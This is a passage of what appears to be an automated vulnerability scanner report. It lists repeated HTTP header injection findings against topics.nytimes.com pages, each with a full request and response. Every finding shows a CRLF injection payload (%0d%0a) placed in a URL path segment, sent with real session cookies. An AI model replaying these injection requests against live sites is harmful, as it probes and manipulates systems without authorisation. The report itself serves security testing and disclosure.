GET /top/opinion/editorialsandoped/oped/columnists/ca88e%0d%0a95b10fb38c5/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:40 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ca88e 95b10fb38c5/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/contributors/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload eb712%0d%0a0beb5e0feca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/eb712%0d%0a0beb5e0feca/editorialsandoped/oped/contributors/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/eb712 0beb5e0feca/editorialsandoped/oped/contributors/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/contributors/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 5f651%0d%0a988d28d4d19 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/5f651%0d%0a988d28d4d19/oped/contributors/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/5f651 988d28d4d19/oped/contributors/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/contributors/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 3c52f%0d%0a74ac431d19e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/3c52f%0d%0a74ac431d19e/contributors/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/3c52f 74ac431d19e/contributors/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/contributors/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload fc78e%0d%0aad7fb1cd36 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/oped/fc78e%0d%0aad7fb1cd36/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/fc78e ad7fb1cd36/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload a3d8a%0d%0afeeb0597b5c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/a3d8a%0d%0afeeb0597b5c/timestopics/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:40:48 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/a3d8a feeb0597b5c/timestopics/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 1ba27%0d%0a30fc9b65d99 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/1ba27%0d%0a30fc9b65d99/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:40:48 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/1ba27 30fc9b65d99/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/organizations/p/park51/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 12c7d%0d%0ad02959b441 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/12c7d%0d%0ad02959b441/timestopics/organizations/p/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/12c7d d02959b441/timestopics/organizations/p/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/organizations/p/park51/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 9a0c4%0d%0a26bcdaf529 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/9a0c4%0d%0a26bcdaf529/organizations/p/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/9a0c4 26bcdaf529/organizations/p/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/organizations/p/park51/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 2d70a%0d%0a0b18576cfa6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/2d70a%0d%0a0b18576cfa6/p/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/2d70a 0b18576cfa6/p/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/organizations/p/park51/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload ca929%0d%0a23e3cdede98 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/organizations/ca929%0d%0a23e3cdede98/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/organizations/ca929 23e3cdede98/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/organizations/p/park51/ |
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload 6e96e%0d%0a3e5641ba8fc was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/organizations/p/6e96e%0d%0a3e5641ba8fc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:34 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/organizations/p/6e96e 3e5641ba8fc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/people/m/madonna/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 9c59a%0d%0a76e21e137a4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/9c59a%0d%0a76e21e137a4/timestopics/people/m/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/9c59a 76e21e137a4/timestopics/people/m/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/people/m/madonna/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload bb56f%0d%0a3e3182b0228 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/bb56f%0d%0a3e3182b0228/people/m/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/bb56f 3e3182b0228/people/m/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/people/m/madonna/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 416d4%0d%0a59dfc04082f was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/416d4%0d%0a59dfc04082f/m/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/416d4 59dfc04082f/m/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/people/m/madonna/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 105b9%0d%0a853f313a162 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
